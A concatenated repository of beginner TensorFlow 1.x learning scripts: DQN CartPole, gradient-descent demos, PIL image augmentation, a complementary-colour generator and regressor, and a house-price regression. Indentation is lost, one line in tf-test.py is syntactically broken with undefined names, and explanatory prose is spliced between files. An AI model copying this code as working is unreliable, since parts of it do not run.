ax1.set_xlim([0, EPISODES])
x_data = []
y_data = []
#ax1.axis(0,0,100,100)
#line, = ax1.plot([], [], lw=2)
#line.set_data([], [])
# self.line1 = Line2D([], [], color='black')
ax2 = fig.add_subplot(212)
ax2.set_xlim([0, EPISODES])
env = gym.make('CartPole-v1')
state_size = env.observation_space.shape[0]
action_size = env.action_space.n
print("state_size: {}, action_size: {}".format(state_size,action_size))
agent = DQNAgent(state_size, action_size)
# agent.load("./save/cartpole-dqn.h5")
done = False
batch_size = 32
ax1.set_ylim([0, agent.epsilon])
for e in range(EPISODES):
state = env.reset()
state = np.reshape(state, [1, state_size])
# print(state)
print("START EPISODE {}".format(e), state)
for time in range(500):
# env.render()
# choose the action
action = agent.act(state)
# apply the action
next_state, reward, done, _ = env.step(action)
# print(time, action, done, reward, next_state)
reward = reward if not done else -10
next_state = np.reshape(next_state, [1, state_size])
# add to memory
agent.remember(state, action, reward, next_state, done)
state = next_state
# if the episode is over, print and plot the results
if done:
print("episode: {}/{}, score: {}, e: {:.2}"
.format(e, EPISODES, time, agent.epsilon))
#ax1.plot(e, time, 'ro')
#plt.plot(e, time, 'ro')
#xdata.append(e)
#ydata.append(time)
#line.set_xdata(xdata)
#line.set_ydata(ydata)
#plt.draw()
#plt.show()
#plt.pause(1e-17)
ax1.plot(e, agent.epsilon, 'ro')
x_data.append(e)
y_data.append(time)
ax2.plot(x_data, y_data, 'g-')
# ax1.set_xlabel('x step: {0} cost: {1}'.format(step, c1))
# plt.xlim(-2, 2)
# plt.ylim(0.1, 0.6)
# plt.ylabel('y {0} '.format(step))
plt.pause(1e-17)
#plt.legend()
plt.show()
#plt.pause(0.1)
#plt.legend()
#plt.show()
break
# once memory holds more than one batch, run a replay training step
if len(agent.memory) > batch_size:
# print("REPLAY ", len(agent.memory),batch_size)
agent.replay(batch_size)
# if e % 10 == 0:
# agent.save("./save/cartpole-dqn.h5")
fig.savefig('dqnOutput.png')<file_sep>/Gradient-Demo-TB.py
import numpy as np
# import matplotlib.pyplot as plt
import tensorflow as tf
# helper for variable defs
def init_weights(shape, name):
return tf.Variable(tf.random_normal(shape, stddev=0.01), name=name)
MODEL_FOLDER = './model/gradient-demo-tb'
# enable plot update
# plt.ion()
# plt.legend()
# Function to minimize
# y = 0.1 * x + 0.3
num_points = 1000
# STEP 1 - input data build
with tf.name_scope('input'):
vectors_set = []
for i in range(num_points):
x1 = np.random.normal(0.0, 0.55)
y1 = x1 * 0.1 + 0.3 + np.random.normal(0.0, 0.03)
vectors_set.append([x1, y1])
x_data = [v[0] for v in vectors_set]
y_data = [v[1] for v in vectors_set]
#tf.summary.image('input_x', x_data, 10)
#tf.summary.image('input_y', y_data, 10)
# STEP 2 - create input and placeholders
# The objective is to generate a TensorFlow code that allows to find the best parameters W and b,
# that from input data x_data, adjunct them to y_data output data, in our case it will be a straight
# line defined by y_data = W * x_data + b .
# The reader knows that W should be close to 0.1 and b to 0.3,
# but TensorFlow does not know and it must realize it for itself.
W = tf.Variable(tf.random_uniform([1], -1.0, 1.0))
b = tf.Variable(tf.zeros([1]))
#STEP 3 - model
y = W * x_data + b
#STEP 4 - cost function
# mean squared error helps us to move forward step by step.
with tf.name_scope("cost"):
cost = tf.reduce_mean(tf.square(y - y_data))
# train_op = tf.train.RMSPropOptimizer(0.001, 0.9).minimize(cost)
train_op = tf.train.GradientDescentOptimizer(0.5).minimize(cost)
#STEP 5 - Summary all variables
# Initializing the variables
init = tf.global_variables_initializer()
tf.summary.scalar("cost", cost)
# Create summaries to visualize weights
for var in tf.trainable_variables():
print(var.name)
tf.summary.histogram(var.name, var)
## Summarize all gradients
#for grad, var in grads:
# tf.summary.histogram(var.name + '/gradient', grad)
# Merge all summaries into a single op
merged_summary_op = tf.summary.merge_all()
#Step 9 Create a session - START
with tf.Session() as sess:
# The algorithm begins with the initial values of a set of parameters (in our case W and b),
# and then the algorithm is iteratively adjusting the value of those variables in a way that,
# in the end of the process, the values of the variables minimize the cost function.
# Step 10 create a log writer. run 'tensorboard --logdir=./logs/nn_logs'
summary_writer = tf.summary.FileWriter(MODEL_FOLDER, sess.graph) # for 0.8
# merged = tf.summary.merge_all()
sess.run(init)
for step in range(100):
t, summary, c = sess.run([train_op,merged_summary_op,cost])
print(c)
summary_writer.add_summary(summary, step)  # global_step should be the iteration count, not the cost
print(step, sess.run(W), sess.run(b), sess.run(cost))
print("Run the command line:\n --> tensorboard --logdir=/tmp/tensorflow_logs nThen open http://0.0.0.0:6006/ into your web browser")
<file_sep>/data_augmentation.py
# Data Augmentation
# Prepares a set of images from the originals with a few transformations, keeping the original size
#
# 1. Rotation right/left (3 degrees)
# 2. Translation by 10 or 20 px
# 3. Zoom
#
import PIL
from PIL import Image
from PIL import ImageFilter
from PIL import ImageOps
import skimage
import os
from skimage.viewer import ImageViewer
from skimage import data
from skimage import io
from skimage import transform
from skimage.transform import rescale
SOURCE_FILE_FOLDER = 'C:/Users/M05831/Downloads/C_I/output_png'
SOURCE_FILE_FOLDER_COLLECTION = 'C:/Users/M05831/Downloads/C_I/output_png/*.png'
OUTPUT_FILE_FOLDER = 'C:/Users/M05831/Downloads/C_I/output_test'
print('START')
print(SOURCE_FILE_FOLDER)
def rotate_image_and_save(img2rotate, rotation, fname):
print('rotate_image:', rotation)
im2 = img2rotate.convert('RGBA')
print(im2.size)
# rotated image
rot = im2.rotate(rotation, expand=1)
# a white image same size as rotated image
# fff = Image.new('RGBA', rot.size, (255,) * 4)
print(rot.size)
fff = Image.new('RGBA', (160,120), (255,) * 4)
# create a composite image using the alpha layer of rot as a mask
out = Image.composite(rot, fff, rot)
print(out.size)
out.save(fname, "PNG")
files = [ f for f in os.listdir(SOURCE_FILE_FOLDER) if os.path.isfile(os.path.join(SOURCE_FILE_FOLDER, f))]
for f in files:
print(f)
filename = os.path.join(SOURCE_FILE_FOLDER, f)
print('open:' + filename)
im = Image.open(filename)
print(im.size)
print(im.mode)
# PIL.ImageOps.grayscale(image)
imGray = PIL.ImageOps.grayscale(im)
filename = os.path.join(OUTPUT_FILE_FOLDER, 'G1' + f)
imGray.save(filename, "PNG")
print('GrayScale:' + filename)
print(imGray.size)
print(imGray.mode)
print(list(imGray.getdata()))
# 1 - Expand with a white border
imExp = PIL.ImageOps.expand(imGray , 10, '#ffffff')
filename = os.path.join(OUTPUT_FILE_FOLDER, 'X1' + f)
print('border:' + filename)
#imExp.save(filename, "PNG")
# PIL.ImageOps.fit(image, size, method=0, bleed=0.0, centering=(0.5, 0.5))
###imRot = imExp.rotate(3.0) # degrees counter-clockwise
filename = os.path.join(OUTPUT_FILE_FOLDER, 'R2' + f)
print('border:' + filename)
###imRot.save(filename, "PNG")
# ZOOM_1
# ZOOM_2
# viewer = ImageViewer(moon)
# viewer.show()
rotate_image_and_save(imExp, 3.0, os.path.join(OUTPUT_FILE_FOLDER, 'R1' + f))
rotate_image_and_save(imExp,-3.0, os.path.join(OUTPUT_FILE_FOLDER, 'R2' + f))
rotate_image_and_save(imExp, 4.0, os.path.join(OUTPUT_FILE_FOLDER, 'R3' + f))
rotate_image_and_save(imExp,-4.0, os.path.join(OUTPUT_FILE_FOLDER, 'R4' + f))
#ic = io.ImageCollection(SOURCE_FILE_FOLDER_COLLECTION, conserve_memory=False, plugin='test')
#io.imshow_collection(ic)
print('END')
#filename = os.path.join(skimage.data_dir, 'moon.png')
#moon = io.imread(filename)
#camera = data.camera()
#type(camera)
#image = data.coins()
#viewer = ImageViewer(image)
#viewer.show()<file_sep>/tf-DNN-REGRESSION-COLOR.py
# https://www.tensorflow.org/get_started/input_fn
# https://github.com/tensorflow/tensorflow/blob/r1.3/tensorflow/examples/tutorials/input_fn/boston.py
"""DNNRegressor with custom input_fn for Complementary Color TEST!!!! dataset."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import itertools
import pandas as pd
import tensorflow as tf
tf.logging.set_verbosity(tf.logging.INFO)
# SOURCE_COLOR_R,SOURCE_COLOR_G,SOURCE_COLOR_B,COMPLEMENT_COLOR_R,COMPLEMENT_COLOR_G,COMPLEMENT_COLOR_B
COLUMNS = ["SOURCE_COLOR","COMPLEMENT_COLOR"]
FEATURES = ["SOURCE_COLOR"]
# LABELS = ["COMPLEMENT_COLOR_R","COMPLEMENT_COLOR_G","COMPLEMENT_COLOR_B"]
LABELS = ["COMPLEMENT_COLOR_R"]
LABEL = "COMPLEMENT_COLOR"
C_COLOR_TRAINING = "tf-c-color-training.csv"
C_COLOR_TEST = "tf-c-color-test.csv"
C_COLOR_PREDICT = "tf-c-color-prediction.csv"
# for TensorBoard
MODEL_DIR = "c:/ai/nn/tmp/model/dnnccolorregression"
def get_input_fn(data_set, num_epochs=None, shuffle=True):
return tf.estimator.inputs.pandas_input_fn(
x=pd.DataFrame({k: data_set[k].values for k in FEATURES}),
y=pd.Series(data_set[LABEL].values),
#y=pd.DataFrame({k: data_set[k].values for k in LABELS}),
num_epochs=num_epochs,
shuffle=shuffle)
def main(unused_argv):
# Load datasets
training_set = pd.read_csv(C_COLOR_TRAINING, skipinitialspace=True, skiprows=1, names=COLUMNS)
test_set = pd.read_csv(C_COLOR_TEST, skipinitialspace=True, skiprows=1, names=COLUMNS)
# Set of 6 examples for which to predict median house values
prediction_set = pd.read_csv(C_COLOR_PREDICT, skipinitialspace=True, skiprows=1, names=COLUMNS)
# Feature cols
feature_cols = [tf.feature_column.numeric_column(k) for k in FEATURES]
# Build 2 layer fully connected DNN with 10, 10 units respectively.
regressor = tf.estimator.DNNRegressor(feature_columns=feature_cols,
hidden_units=[30, 20, 10],
# label_dimension=2, # modifica per output multi-dimensionale
model_dir=MODEL_DIR)
# Train
# regressor.train(input_fn=get_input_fn(training_set), steps=1000)
# Evaluate loss over one epoch of test_set.
# ev = regressor.evaluate( input_fn=get_input_fn(test_set, num_epochs=1, shuffle=False ))
# loss_score = ev["loss"]
# print("Loss: {0:f}".format(loss_score))
# Print out predictions over a slice of prediction_set.
y = regressor.predict( input_fn=get_input_fn(prediction_set, num_epochs=1, shuffle=False) )
# .predict() returns an iterator of dicts; convert to a list and print
# predictions
# predictions = list(p["predictions"] for p in itertools.islice(y, 6))
predictions = list(p["predictions"] for p in y)
print("Predictions: {}".format(str(predictions)))
print("Predictions_set")
for ps in prediction_set:
print(ps)
print("predictions")
for p in predictions:
print(p)
if __name__ == "__main__":
tf.app.run()<file_sep>/README.md
## Tf Project
Project
# tf-simple-tensorboard.py
<file_sep>/tf-test.py
# test con i tensori
# test con la gestione delle immagini
# test input variable and softmax examples..
# test con TensorBoard
import tensorflow as tf
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
import csv
import io
print("Tensorflow version: " + tf.__version__)
tf.set_random_seed(1)
weights = tf.Variable(tf.random_normal([784, 200], stddev=0.35), name="weights")
biases = tf.Variable(tf.zeros([200]), name="biases")
b_test = tf.Variable(tf.random_uniform([6], minval=0.0, maxval=1.0, dtype=tf.float32), name="eeee")
init = tf.global_variables_initializer()
MODEL_FOLDER = './model/test-tf-test'
# Build a plot from a series of points and return it as a PNG buffer
def gen_plot(d):
"""Create a pyplot plot and save to buffer."""
plt.figure()
plt.plot(d[:,0],d[:,1],'ro')
plt.title("Punti di interesse")
buf = io.BytesIO()
plt.savefig(buf, format='png')
buf.seek(0)
return buf
# Build a plot from a series of points and decode it into an image tensor
def read_and_decode(d):
print('Read and decode')
plt.figure()
plt.plot(d[:,0],d[:,1],'ro')
plt.title("Punti di interesse")
buf = io.BytesIO()
plt.savefig(buf, format='png')
buf.seek(0)
image = tf.image.decode_png(buf.getvalue(), channels=4)
# Add the batch dimension
image = tf.expand_dims(image, 0)
return image
# Update the tensor with the images
def update_images():
print('update_images')
return
print('Starting operations')
dati = np.random.randint(100, size=(20, 2))
current_image_object = read_and_decode(dati)
# tf.concat([t1, t2], 0)
lista_immagini = tf.concat([current_image_object, read_and_decode(dati)],0)
# definisce variabili per TB
tf.summary.histogram("normal/moving_mean", weights)
tf.summary.histogram("normal/loss", biases)
tf.summary.histogram("normal/loss1", Y, Y_
#tf.summary.scalar("normal/current_w", b_test)
tf.summary.image("img", current_image_object)
tf.summary.image("img2", lista_immagini)
with tf.Session() as sess:
#print the product
sess.run([init])
writer = tf.summary.FileWriter(MODEL_FOLDER, sess.graph)
writer2 = tf.summary.FileWriter(MODEL_FOLDER, sess.graph)
summaries = tf.summary.merge_all()
for i in range(5):
print('Step:',i)
rd, summary, li = sess.run([current_image_object, summaries, lista_immagini])
# print(weights.eval())
print("b_test:")
print(b_test.eval())
lista_immagini = tf.zeros([3, 4], tf.int32)
b_test_softmax = tf.nn.softmax(b_test)
print("b_test_softmax:")
print(b_test_softmax.eval())
# print(current_image_object.eval())
writer.add_summary(summary, global_step=i)
sess.close()<file_sep>/Gradient-Demo.py
import numpy as np
import matplotlib.pyplot as plt
import tensorflow as tf
# helper for variable defs
def init_weights(shape, name):
return tf.Variable(tf.random_normal(shape, stddev=0.01), name=name)
# enable plot update
plt.ion()
plt.legend()
# Function to minimize
# y = 0.1 * x + 0.3
num_points = 1000
# STEP 1 - input data build
vectors_set = []
for i in range(num_points):
x1 = np.random.normal(0.0, 0.55)
y1 = x1 * 0.1 + 0.3 + np.random.normal(0.0, 0.03)
vectors_set.append([x1, y1])
x_data = [v[0] for v in vectors_set]
y_data = [v[1] for v in vectors_set]
# STEP 2 - create input and placeholders
# The objective is to generate a TensorFlow code that allows to find the best parameters W and b,
# that from input data x_data, adjunct them to y_data output data, in our case it will be a straight
# line defined by y_data = W * x_data + b .
# The reader knows that W should be close to 0.1 and b to 0.3,
# but TensorFlow does not know and it must realize it for itself.
W = tf.Variable(tf.random_uniform([1], -1.0, 1.0))
b = tf.Variable(tf.zeros([1]))
#STEP 3 - model
y = W * x_data + b
#STEP 4 - cost function
# mean squared error helps us to move forward step by step.
cost = tf.reduce_mean(tf.square(y - y_data))
# train_op = tf.train.RMSPropOptimizer(0.001, 0.9).minimize(cost)
train_op = tf.train.GradientDescentOptimizer(0.1).minimize(cost)
# tf.scalar_summary("cost", cost)
# Initializing the variables
init = tf.global_variables_initializer()
#Step 9 Create a session - START
with tf.Session() as sess:
# The algorithm begins with the initial values of a set of parameters (in our case W and b),
# and then the algorithm is iteratively adjusting the value of those variables in a way that,
# in the end of the process, the values of the variables minimize the cost function.
sess.run(init)
fig1 = plt.figure()
ax1 = fig1.add_subplot(211)
ax2 = fig1.add_subplot(212)
for step in range(10):
t1,w1, b1, c1 = sess.run([train_op, W, b, cost])
# print(step, sess.run(W), sess.run(b), sess.run(cost))
print(w1, c1)
ax1.plot(x_data, y_data, 'ro')
# ax1.plot(x_data, sess.run(W) * x_data + sess.run(b))
ax1.plot(x_data, w1 * x_data + b1)
ax2.plot(x_data, w1 * x_data + b1)
ax1.set_xlabel('x step: {0} cost: {1}'.format(step,c1))
# plt.xlim(-2, 2)
# plt.ylim(0.1, 0.6)
# plt.ylabel('y {0} '.format(step))
plt.pause(0.5)
plt.legend()
plt.show()
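The fit above does not strictly need TensorFlow: the mean-squared-error gradients have a closed form (dW = 2·mean((W·x + b − y)·x), db = 2·mean(W·x + b − y)), so plain NumPy gradient descent recovers W ≈ 0.1 and b ≈ 0.3. A minimal sketch of the same optimization, with a fixed seed for reproducibility (learning rate and step count are illustrative choices, not taken from the script):

```python
import numpy as np

# Same synthetic data as the script: y = 0.1 * x + 0.3 plus small noise
rng = np.random.RandomState(0)
x = rng.normal(0.0, 0.55, 1000)
y = 0.1 * x + 0.3 + rng.normal(0.0, 0.03, 1000)

W, b, lr = 0.0, 0.0, 0.5
for _ in range(500):
    err = W * x + b - y
    W -= lr * 2 * np.mean(err * x)   # d(cost)/dW for cost = mean((err)^2)
    b -= lr * 2 * np.mean(err)       # d(cost)/db

print(round(W, 2), round(b, 2))  # converges near 0.1 and 0.3
```

The update rule is exactly what `tf.train.GradientDescentOptimizer` computes automatically; writing it out makes the "iteratively adjusting W and b" explanation in the comments concrete.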
<file_sep>/tf-complementary-generator.py
# Complementary color generator
# https://www.mathsisfun.com/hexadecimal-decimal-colors.html
import csv
from random import randint
NUM_OF_ROW_DATA_TRAINING = 1000
NUM_OF_ROW_DATA_TEST = 100
NUM_OF_ROW_DATA_PREDICTION = 10
MAX_COLOR_VALUE = 16777215
# Sum of the min & max of (a, b, c)
def hilo(a, b, c):
if c < b: b, c = c, b
if b < a: a, b = b, a
if c < b: b, c = c, b
return a + c
def complement(r, g, b):
k = hilo(r, g, b)
return list(k - u for u in (r, g, b))
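The `hilo` swap chain above computes the sum of the minimum and maximum of the three channels; subtracting each channel from that sum reflects it around the midpoint, which yields the complementary color. A self-contained sketch of the same idea (using `min`/`max` instead of the swap chain; the function names mirror the ones above):

```python
def hilo(a, b, c):
    """Sum of the minimum and maximum of (a, b, c)."""
    return min(a, b, c) + max(a, b, c)

def complement(r, g, b):
    """Complementary RGB color: each channel reflected around (min + max)."""
    k = hilo(r, g, b)
    return [k - u for u in (r, g, b)]

# Pure red maps to cyan, and complementing twice returns the original color,
# since (min + max) is preserved by the reflection.
print(complement(255, 0, 0))                 # [0, 255, 255]
print(complement(*complement(10, 200, 30)))  # [10, 200, 30]
```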
def genColor():
r = randint(0, 255)
g = randint(0, 255)
b = randint(0, 255)
# print(r,g,b)
l = [r,g,b]
return l
def color2num(c):
# print((65536 * c[0] + 256 * c[1] + c[2]))
return (65536 * c[0] + 256 * c[1] + c[2]) / MAX_COLOR_VALUE
def num2col(n):
nv = n * MAX_COLOR_VALUE
# print('nv:', nv)
r = int( nv / 65536 )
# print(r * 65536)
g = int ( (nv - ( r * 65536) ) / 256 )
b = int ( (nv - ( r * 65536) - ( g * 256 ) ) )
return [r, g, b]
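Because `color2num` divides by `MAX_COLOR_VALUE` and `num2col` multiplies back, floating-point rounding can shift the blue channel by one on a round trip. An integer-only pack/unpack (a hypothetical alternative, not the script's normalized 0..1 encoding) round-trips exactly:

```python
def pack_rgb(r, g, b):
    """Pack three 0..255 channels into one integer (0xRRGGBB)."""
    return (r << 16) | (g << 8) | b

def unpack_rgb(n):
    """Inverse of pack_rgb, using exact integer arithmetic."""
    return [(n >> 16) & 0xFF, (n >> 8) & 0xFF, n & 0xFF]

print(unpack_rgb(pack_rgb(12, 34, 56)))  # [12, 34, 56]
print(pack_rgb(255, 255, 255))           # 16777215, i.e. MAX_COLOR_VALUE
```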
def generateData( numOfRow, fileName ):
print('Generate', numOfRow, fileName )
with open(fileName, 'wt') as csvfile:
writer = csv.writer(csvfile, lineterminator='\n')
writer.writerow(('SOURCE_COLOR','COMPLEMENT_COLOR'))
        for count in range(numOfRow):
# print(count)
t = genColor()
c = complement(t[0],t[1],t[2])
# print(t[0],t[1],t[2],c[0],c[1],c[2])
# writer = csv.writer(csvfile, delimiter=',', quotechar='', quoting=csv.QUOTE_MINIMAL)
# writer.writerow( ('Title 1', 'Title 2', 'Title 3') )
#writer.writerow((t[0],t[1],t[2],c[0],c[1],c[2]))
writer.writerow( (color2num(t),color2num(c)) )
csvfile.close()
return
def generateDataPredict( numOfRow, fileName ):
print('Generate', numOfRow, fileName )
with open(fileName, 'wt') as csvfile:
writer = csv.writer(csvfile, lineterminator='\n')
writer.writerow(('SOURCE_COLOR','NONE'))
        for count in range(numOfRow):
# print(count)
t = genColor()
c = complement(t[0],t[1],t[2])
# print(t[0],t[1],t[2],c[0],c[1],c[2])
# writer = csv.writer(csvfile, delimiter=',', quotechar='', quoting=csv.QUOTE_MINIMAL)
writer.writerow( (color2num(t), color2num(c)) )
#writer.writerow((t[0],t[1],t[2]))
csvfile.close()
return
test = genColor()
cn = color2num(test)
nc = num2col(cn)
cp = complement(test[0],test[1],test[2])
print(test, cn, nc)
#generateData(NUM_OF_ROW_DATA_TRAINING, 'tf-c-color-training.csv')
#generateData(NUM_OF_ROW_DATA_TEST, 'tf-c-color-test.csv')
generateDataPredict(NUM_OF_ROW_DATA_PREDICTION, 'tf-c-color-prediction.csv')
print('END OF OPERATIONS')
# https://www.codementor.io/jimmfleming/how-i-built-a-reverse-image-search-with-machine-learning-and-tensorflow-part-1-8dje8gjm9
# https://indico.io/blog/tensorflow-data-inputs-part1-placeholders-protobufs-queues/
# Build DataSet ...
# From a folder of images, prepares the dataset for the network
#
# 1. Rotation left/right (3°)
# 2. Translation by 10, 20 px
# 3. Zoom
import PIL
from PIL import Image
from PIL import ImageFilter
from PIL import ImageOps
import skimage
# REMOVE WARNING compile!
import os
os.environ['TF_CPP_MIN_LOG_LEVEL']='2'
from skimage import data
from skimage import io
from skimage import transform
from skimage.transform import rescale
import tensorflow as tf
print("Tensorflow version " + tf.__version__)
tf.set_random_seed(0)
tf.logging.set_verbosity(tf.logging.INFO)
print('1-Start --------------------------------------------------------- 1 ')
SOURCE_FILE_FOLDER = 'C:/Users/M05831/Downloads/C_I/output_png'
SOURCE_FILE_FOLDER_COLLECTION = 'C:/Users/M05831/Downloads/C_I/output_png/*.png'
OUTPUT_FILE_FOLDER = 'C:/Users/M05831/Downloads/C_I/output_test'
# TF https://www.tensorflow.org/programmers_guide/reading_data
# Reading from files
# A typical pipeline for reading records from files has the following stages:
# The list of filenames
# Optional filename shuffling
# Optional epoch limit
# Filename queue
# A Reader for the file format
# A decoder for a record read by the reader
# Optional preprocessing
# Example queue
# Make a queue of file names including all the JPEG images files in the relative
# image directory.
def generate_input_fn(file_pattern, batch_size, num_epochs=None, shuffle=False):
"Return _input_fn for use with Experiment."
def _input_fn():
height, width, channels = [256, 256, 3]
filenames_tensor = tf.train.match_filenames_once(file_pattern)
filename_queue = tf.train.string_input_producer(
filenames_tensor,
num_epochs=num_epochs,
shuffle=shuffle)
reader = tf.WholeFileReader()
filename, contents = reader.read(filename_queue)
image = tf.image.decode_jpeg(contents, channels=channels)
image = tf.image.resize_image_with_crop_or_pad(image, height, width)
        image_batch, filename_batch = tf.train.batch(
            [image, filename],
            batch_size,
            num_threads=4,
            capacity=50000)
        # Converts image from uint8 to float32 and rescales from 0..255 => 0..1
        # Rescale from 0..1 => -1..1 so that the "center" of the image range is roughly 0.
        image_batch = tf.to_float(image_batch) / 255
        image_batch = (image_batch * 2) - 1
        features = {
            "image": image_batch,
            "filename": filename_batch
}
labels = {
"image": image_batch
}
return features, labels
return _input_fn
all_files = [ (SOURCE_FILE_FOLDER + '/' + f) for f in os.listdir(SOURCE_FILE_FOLDER) if os.path.isfile(os.path.join(SOURCE_FILE_FOLDER, f))]
print(all_files)
print('2-Start --------------------------------------------------------- 1 ')
fq1 = tf.train.match_filenames_once(all_files)
# fq1 = tf.train.match_filenames_once(['./images/*.jpg','c:/*.*'])
#fq1 = ["c:/Users/M05831/PycharmProjects/nn/images/a.png", "c:/Users/M05831/PycharmProjects/nn/images/b.png"]
#tf.train.match_filenames_once('')
print('3-Start --------------------------------------------------------- 1 ')
filename_queue = tf.train.string_input_producer(all_files)
# Read an entire image file, which is required for encoded images (PNG here).
# If the images are too large they could be split in advance into smaller files,
# or a fixed-length reader could be used to split up the file.
print('4-Start --------------------------------------------------------- 1 ')
image_reader = tf.WholeFileReader()
# Read a whole file from the queue, the first returned value in the tuple is the
# filename which we are ignoring.
print('5-Start --------------------------------------------------------- 1 ')
_, image_file = image_reader.read(filename_queue)
# Decode the image as a JPEG file, this will turn it into a Tensor which we can
# then use in training.
# image = tf.image.decode_jpeg(image_file) JPEG
print('6-Start --------------------------------------------------------- 1 ')
image = tf.image.decode_png(image_file)
init = tf.global_variables_initializer()
# Start a new session to show example output.
with tf.Session() as sess:
# Required to get the filename matching to run.
#tf.initialize_all_variables().run()
sess.run(init)
    # Note: generate_input_fn returns a Python function, not a tensor, so it
    # cannot be passed to sess.run(); build the input_fn and call it instead:
    # features, labels = generate_input_fn(SOURCE_FILE_FOLDER_COLLECTION, batch_size=32)()
print('R1 - Start --------------------------------------------------------- 1 ')
# print(sess.run(fq1))
print('R2 - Start --------------------------------------------------------- 2 ')
# Coordinate the loading of image files.
coord = tf.train.Coordinator()
threads = tf.train.start_queue_runners(coord=coord)
print('R3 - Start --------------------------------------------------------- 2 ')
# Get an image tensor and print its value.
image_tensor = sess.run([image])
print(image_tensor)
# Finish off the filename queue coordinator.
coord.request_stop()
coord.join(threads)
<file_sep>/GraphDemo.py
import matplotlib.pyplot as plt
import matplotlib.animation as animation
import random
import gym
import numpy as np
EPISODES = 1000
x_data = []
y_data = []
plt.ion()
fig = plt.figure()
ax1 = fig.add_subplot(211)
ax1.set_xlabel('x')
ax1.set_ylabel('y')
ax1.set_title('fff')
ax1.set_xlim([0, EPISODES])
ax1.set_ylim([0, 500])
ax2 = fig.add_subplot(212)
for e in range(1000):
y = random.randint(0,500)
print(e, y)
ax1.plot(e, y, 'ko')
x_data.append(e)
y_data.append(y)
ax2.plot(x_data, y_data, 'b-')
#line.set_data(e, y)
plt.pause(0.05)
while True:
plt.pause(0.05)<file_sep>/ml-course-week-1.py
# https://www.coursera.org/learn/ml-foundations/supplement/RP8te/reading-predicting-house-prices-assignment
# WEEK 1
# Linear regression on the home price prediction data in TensorFlow
'''
my_features = ['bedrooms', 'bathrooms', 'sqft_living', 'sqft_lot', 'floors', 'zipcode']
advanced_features = [
'bedrooms', 'bathrooms', 'sqft_living', 'sqft_lot', 'floors', 'zipcode',
'condition', # condition of house
'grade', # measure of quality of construction
'waterfront', # waterfront property
'view', # type of view
'sqft_above', # square feet above ground
'sqft_basement', # square feet in basement
'yr_built', # the year built
'yr_renovated', # the year renovated
'lat', 'long', # the lat-long of the parcel
'sqft_living15', # average sq.ft. of 15 nearest neighbors
'sqft_lot15', # average lot size of 15 nearest neighbors
]
'''
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import urllib
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
# Data sets
DATA_DIR = "./data/home/"
SOURCE_SET = DATA_DIR + "home.csv"
TRAINING_SET = DATA_DIR + "home-training.csv"
TEST_SET = DATA_DIR + "home-test.csv"
PREDICTION_SET = DATA_DIR + "home-prediction.csv"
# for TensorBoard
MODEL_DIR = "./model/home"
MODEL_TRAINIG_STEP = 1000
print('## Starting operations')
import tensorflow as tf
tf.logging.set_verbosity(tf.logging.INFO)
print("Tensorflow version: " + tf.__version__)
COLUMNS = ["sqft_living", "price"]
FEATURES = ["sqft_living", "price"]
LABEL = "price"
def get_input_fn(data_set, num_epochs=None, shuffle=True):
return tf.estimator.inputs.pandas_input_fn(
x=pd.DataFrame({k: data_set[k].values for k in FEATURES}),
y=pd.Series(data_set[LABEL].values),
num_epochs=num_epochs,
shuffle=shuffle)
def build_dataset():
print('## Build Data Set')
all_data = pd.read_csv(SOURCE_SET)
print(all_data)
    # Data visualization
# df = pd.Series(np.random.randn(1000), index=pd.date_range('1/1/2000', periods=1000))
'''
df = pd.Series(all_data['sqft_living'], all_data['price'])
plt.figure()
plt.plot(all_data['sqft_living'],all_data['price'],'ro')
plt.show()
'''
    print('Feature selection')
my_features = all_data[['sqft_living','price']]
print(my_features)
all_data['split'] = np.random.randn(all_data.shape[0], 1)
msk = np.random.rand(len(all_data)) <= 0.7
train = all_data[msk]
test = all_data[~msk]
print(train)
print(test)
print(len(train))
print(len(test))
print('Save data :', TRAINING_SET)
train.to_csv(TRAINING_SET, encoding='utf-8-sig')
print('Save data :', TEST_SET)
test.to_csv(TEST_SET, encoding='utf-8-sig')
return
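The random-mask split in `build_dataset` keeps roughly 70% of the rows for training and the rest for testing. The same idea in plain NumPy (array-based here rather than pandas, to keep the sketch dependency-light; the seed is an illustrative choice):

```python
import numpy as np

rng = np.random.RandomState(42)
data = np.arange(1000)

# Boolean mask: True with probability 0.7 -> training row, else test row
msk = rng.rand(len(data)) <= 0.7
train, test = data[msk], data[~msk]

print(len(train), len(test))  # roughly a 70/30 split
assert len(train) + len(test) == len(data)
```

Because the mask is drawn per row, the split sizes fluctuate around 70/30 rather than being exact; for an exact split, one would shuffle indices and slice instead.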
def show_sample_data():
MAX_ROW = 100
print('Show sample data ... first n row', MAX_ROW, TRAINING_SET)
training_set = pd.read_csv(TRAINING_SET, nrows=MAX_ROW)
print(training_set[['sqft_living','price']])
print('Show sample data ... first n row', MAX_ROW, TEST_SET)
test_set = pd.read_csv(TEST_SET, nrows=MAX_ROW)
print(test_set[['sqft_living','price']])
return
def main(unused_argv):
    # Builds the data files for the model
# build_dataset()
# show_sample_data()
# exit(0)
# Load datasets
print('Loading datasets')
training_set = pd.read_csv(TRAINING_SET, skipinitialspace=True, skiprows=1, names=COLUMNS)
test_set = pd.read_csv(TEST_SET, skipinitialspace=True, skiprows=1, names=COLUMNS)
# Set of 6 examples for which to predict median house values
# prediction_set = pd.read_csv("boston_predict.csv", skipinitialspace=True, skiprows=1, names=COLUMNS)
# Feature cols
feature_cols = [tf.feature_column.numeric_column(k) for k in FEATURES]
# summaryWriter
tf.summary.scalar("label", tensor=tf.constant(1))
tf.summary.text(name='loss123',tensor=tf.constant('MARiO'))
merged = tf.summary.merge_all()
# https://www.tensorflow.org/api_guides/python/train#Training_Hooks
# https://www.tensorflow.org/api_docs/python/tf/train/SummarySaverHook
hooks = [
tf.train.LoggingTensorHook({'loss'}, every_n_iter = 10),
tf.train.StepCounterHook(every_n_steps=100),
tf.train.SummarySaverHook(save_steps=100,summary_op=merged)
]
    # Build regressor
print('Regressor...')
regressor = tf.estimator.LinearRegressor(feature_columns=feature_cols,
# hidden_units=[30, 20, 10],
                                            # label_dimension=2, # change for multi-dimensional output
model_dir=MODEL_DIR)
# Train
# print('Training...')
regressor.train(
input_fn=get_input_fn(training_set),
# hooks List of SessionRunHook subclass instances. Used for callbacks inside the training loop.
hooks=hooks,
steps=MODEL_TRAINIG_STEP)
# Evaluate loss over one epoch of test_set.
print('Evaluate...')
